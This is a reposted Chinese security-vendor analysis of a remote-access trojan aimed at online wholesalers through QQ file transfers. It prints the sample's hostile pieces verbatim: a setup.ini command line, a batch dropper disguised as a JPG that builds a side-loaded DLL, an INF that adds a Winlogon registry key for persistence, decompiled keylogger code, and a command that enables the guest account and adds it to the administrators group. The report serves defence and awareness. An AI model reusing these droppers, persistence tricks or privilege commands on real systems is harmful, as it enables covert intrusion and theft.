美文网首页
样本分析 | 远控木马巧设“白加黑”陷阱:瞄准网店批发商牟取钱财

样本分析 | 远控木马巧设“白加黑”陷阱:瞄准网店批发商牟取钱财

作者: 皆明 | 来源:发表于2018-02-04 17:20 被阅读36次
    图1

    近日,360安全中心监测到有不法分子通过添加QQ好友的形式,以沟通商品交易的名义发送名为“这几天团队的量”的文件,一旦接收并打开文件,电脑将被远程控制,不法分子可进一步盗取隐私及财物、甚至植入病毒实现敲诈勒索等操作。

    360安全中心对该样本进行分析发现,“这几天团队的量.rar”是一个将木马打包在其中的压缩包文件,投递目标主要是网络批发商。牧马人通过将木马伪装成数量详情图片文件,在与商家沟通的期间,发送木马文件给商家,引诱商家中招。

    当网店批发商在接受到文件后,解压出文件夹并点击了文件夹中的“宝贝批发数量.com”后,木马就会在后台偷偷跑起来。

    解压后文件夹内容

    文件夹结构

    ┌─ 宝贝批发数量.com
│
├─ setup.ini
│
└─ Data
    ├─ 2018.jpg
    │
    ├─ 360666
    │     ├─ 360666.PNG
    │     ├─ date
    │     ├─ QQAPP.exe
    │     ├─ Readme.txt
    │     ├─ TEMA
    │     ├─ WPS_office2016.lnk
    │     └─  WPS_office2017.lnk
    │
    └─ Order
          ├─ m.exe
          ├─ WoodTorch.exe
          └─ WPS.JPG

    分析

    • 宝贝批发数量.com

    该文件其实为白文件,它带有艾威梯科技(北京)有限公司数字签名。

    艾威梯科技(北京)有限公司数字签名:简称为IVT公司,它是拥有自主知识产权的国际化蓝牙软硬件技术公司。

    签名信息

    程序在执行起来后会读取同目录下的setup.ini文件,根据配置文件中Install项里的CmdLine执行命令。而文件常规打开是一堆乱码,在十六进制试图下可以清楚看到Cmdline命令。

    记事本浏览视图 十六进制浏览视图

    Cmdline命令如下:

    [Install]
    CmdLine=Data\Order\WoodTorch.exe execmd Data\Order\m.exe /c Data\Order\m.exe `< Data\Order\WPS.JPG

    • WoodTorch.exe

    被宝贝批发数量.com加载起来的WoodTorch.exe,实质上是命令行工具Nircmd。而上述的命令语句则是通过execmd这个执行命令指示符,在不显示任何信息至屏幕的情况下执行下面的语句:

    Data\Order\m.exe /c Data\Order\m.exe `< Data\Order\WPS.JPG
    • m.exe

    系统的cmd程序,它的作用是用于加载WPS.JPG这个批处理文件。

    • WPS.JPG

    从文件名上来看它是一个图片,但内容为批处理脚本。内容如下:

    WPS.JPG 
    @echo off
cmd.exe /c start data\2018.jpg
md c:\microsoft
copy Data\360666\Readme.txt c:\microsoft\Readme.txt
copy Data\360666\date c:\microsoft\date
copy Data\360666\360666.PNG c:\microsoft\360666.PNG
copy Data\360666\QQAPP.exe c:\microsoft\QQAPP.exe
copy /b Data\360666\TEMA+ Data\360666\WPS_office2016.lnk+Data\360666\WPS_office2017.lnk c:\microsoft\common.dll
start C:\Microsoft\QQApp.exe
start c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection  c:\microsoft\360666.png,DefaultInstall
pause

    行为分析:

    1. 打开Data目录下的2018.jpg图片
    2. 创建目录 c:\microsoft目录
    3. 拷贝Data\360666目录下的Readme.txt、date、360666.PNG、QQAPP.exe到c:\microsoft目录中
    4. 合并Data\360666目录下的TEMA、WPS_office2016.lnk、WPS_office2017.lnk为c:\microsoft目录下common.dll
    5. 执行C:\Microsoft\QQApp.exe
    6. 执行c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection c:\microsoft\360666.png,DefaultInstall
    • 步骤1的目的是为了让批发商觉得自己真的是打开了一张图片
    图片
    • 步骤2-5为白加黑木马部分

    QQAPP.exe是带有腾讯签名的白文件,由于QQAPP.exe在调用Common.dll时,没有对Common.dll进行校验。牧马人通过将恶意文件拆分成TEMA、WPS_office2016.lnk、WPS_office2017.lnk三个文件,在程序执行过程中合并成common.dll。当QQAPP.exe执行的时候,恶意的common.dll就会被自动加载,从而执行恶意代码。

    • 步骤6的目的是通过360666.png中的配置信息让QQAPP.exe能够在重启后自启动,达到木马驻留受害者电脑的目的。
    [Version]
Signature="$Windows NT$"
[Defaultinstall]
addREG=Gc
[Gc]
HKCU,"Software\Microsoft\Windows NT\CurrentVersion\Winlogon","shell","0x00000000","Explorer.exe,C:\Microsoft\QQApp.exe"
    • common.dll

    InitBugReport :

    a. 通过访问www[.]baidu[.]com测试网络连通性,如果访问失败则ExitProcess。

    测试网络连通性

    b. 导出函数为空,伪造源文件导出函数SetBugReportUin、ValidateBugReport。

    void __cdecl TXBugReport::SetBugReportUin()
{
  sub_10001F44();
}

void sub_10001F44()
{
  ;
}

    void __cdecl TXBugReport::ValidateBugReport()
{
  sub_10001F4B();
}

void sub_10001F4B()
{
  ;
}

    c. 解密Readme.txt,解密后的Readme_dump文件为PeLoad。它负责读取解密同目录下的date文件,并创建新的线程执行解密后的date。

    创建线程
    • Readme_dump(解密后的Readme.txt)

    a. 干扰函数

    void Sleeps()
{
  Sleep(0);
  Sleep(0);
  Sleep(0);
  Sleep(0);
  Sleep(0);
  Sleep(0);
  Sleep(0);
  Sleep(0);
  Sleep(0);
  Sleep(0);
  Sleep(0);
  Sleep(0);
  Sleep(0);
  Sleep(0);
  Sleep(0);
  Sleep(0);
  Sleep(0);
  Sleep(0);
  Sleep(0);
  Sleep(0);
}

    b. 解密date文件。


    解密算法

    c. 读取解密同目录下的date文件,并创建新的线程执行解密后的date。

    加载木马
    • 木马主体(解密后的date)

    a. 判断C:\ProgramData\Microsoft\Windows\Start Menu\Torchwood.lnk文件是否存在,存在则删除文件。

    b. 通过加密字符串T1hEVVFMWFNEVhVfVlsr解密出CC。


    解密CC地址

    c. 网络通讯

    连接CC

    d. 键盘记录,通过异或0x62加密后保存到C:\Windows\system32\ForShare.key。

        while ( 1 )
    {
      v2 = GetKeyState(16);    // 获取shift键状态
      v3 = dword_BCEAF4[v8 / 4];
      if ( ((unsigned __int16)GetAsyncKeyState(dword_BCEAF4[v8 / 4]) >> 8) & 0x80 ) // 获取指定按键状态
      {
        if ( GetKeyState(20) && v2 > -1 && v3 > 64 && v3 < 93 )
        {
          *(&v5 + v3) = 1;
        }
        else
        {
          if ( !GetKeyState(20) )
            goto LABEL_38;
          if ( v2 >= 0 )
            goto LABEL_22;
          if ( v3 > 64 && v3 < 93 )
          {
            *(&v5 + v3) = 2;
          }
          else
          {
LABEL_38:
            if ( v2 >= 0 )
            {
LABEL_22:
              *(&v5 + v3) = 4;
              goto LABEL_34;
            }
            *(&v5 + v3) = 3;
          }
    保存键盘记录

    e. 清除事件日志

    清除事件日志

    f. 遍历进程,检测杀软

    杀软字符串 遍历进程

    g.设置guest 密码,并添加到管理员组。

    net user guest /active:yes && net user guest 123456 && net localgroup administrators guest /add

    h. 其余功能主要还有文件管理、注册表管理、进程管理、shell操作、下载文件、更新客户端、卸载客户端等

    追溯

    根据CC地址duanjiuhao.top的域名信息获取到了域名持有者的姓名、邮箱、手机号。

    whois信息

    最后

    年关将近,不法分子试图利用这些“白加黑”远控木马从中招用户那“谋财”。目前,360安全卫士已经对该类木马进行防御及查杀,在此也提醒网民,提防来历不明的文件、链接,同时开启安全软件,临近新年,为自己的隐私及财产安全加上一把锁。

    相关文章

      网友评论

          本文标题:样本分析 | 远控木马巧设“白加黑”陷阱:瞄准网店批发商牟取钱财

          本文链接:https://www.haomeiwen.com/subject/jlwxzxtx.html

          延伸阅读

          深度阅读

          • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

          栏目导航

          热点阅读

          关于我们|服务条款|联系我们|样本分析 | 远控木马巧设“白加黑”陷阱:瞄准网店批发商牟取钱财|投稿指南|网站地图|RSS订阅|排版工具|手机版

          提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

          Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

          备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

          本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

          所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!